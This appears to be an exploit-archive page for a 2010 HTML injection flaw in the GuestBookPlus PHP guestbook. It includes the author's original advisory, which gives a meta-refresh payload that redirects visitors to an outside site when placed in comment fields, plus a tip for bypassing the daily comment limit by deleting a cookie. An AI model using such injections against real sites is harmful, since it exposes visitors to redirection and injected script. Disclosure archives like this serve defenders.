header-logo
Suggest Exploit
vendor:
GuestBookPlus
by:
MiND
8,8
CVSS
HIGH
HTML Injection
79
CWE
Product Name: GuestBookPlus
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: No
Related CWE: N/A
CPE: a:websitekit:guestbookplus
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010

GuestBookPlus Script PHP (HTML Injection)

GuestBookPlus Script PHP is vulnerable to HTML Injection. An attacker can inject malicious HTML code into the name and body of a comment, which will be executed when the comment is viewed. This can be used to redirect users to malicious websites, or to execute malicious JavaScript code.

Mitigation:

To mitigate this vulnerability, the application should validate user input to ensure that it does not contain malicious HTML code.
Source

Exploit-DB raw data:

=======================================================================
#                         In the name of ALLAH !                      #
=======================================================================
# GuestBookPlus Script PHP (HTML Injection) Vuln.
=======================================================================
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
#################################
#      _____ __    __  /_  __/  #
#     / ___/ \ \  / /   / /     #
#    (__  )   \ \/ /   / /      #
#   /____/     \__/   /_/       #
#################################
########################################################################
# Name: GuestBookPlus Script PHP (HTML Injection) 
# Vendor: http://websitekit.us/GBP_demo.html
# Date: 2010-08-15
# Author: MiND
# Greets: Sa-ViRuS.CoM , RENO , Dr.php , ! BaD BoY ! , Gov.HaCker , Anti-Secure , Dr.$audi all Sa-ViRuS.CoM Members ..
# Contact: f1_1nnym1nd@HoTMaiL.CoM
# Home: WwW.Sa-ViRuS.CoM
########################################################################

[~]Note : Its not free ,, Its by 28 $
[~]You Can Buy It From : http://websitekit.us/guest_book_plus.html



[~] HTML Injection Vuln . : Add a new comment using sign button
Put on the name & body of your comment any html code like: 
<meta http-equiv="refresh" content="0;url=http://sa-virus.com/" />               <==== ( thats redirecting to sa-virus.com ) 

[~] Another note : You can bypass the limit of comments per day in this guestbook script 
By deleting the saved cookie in your computer ;)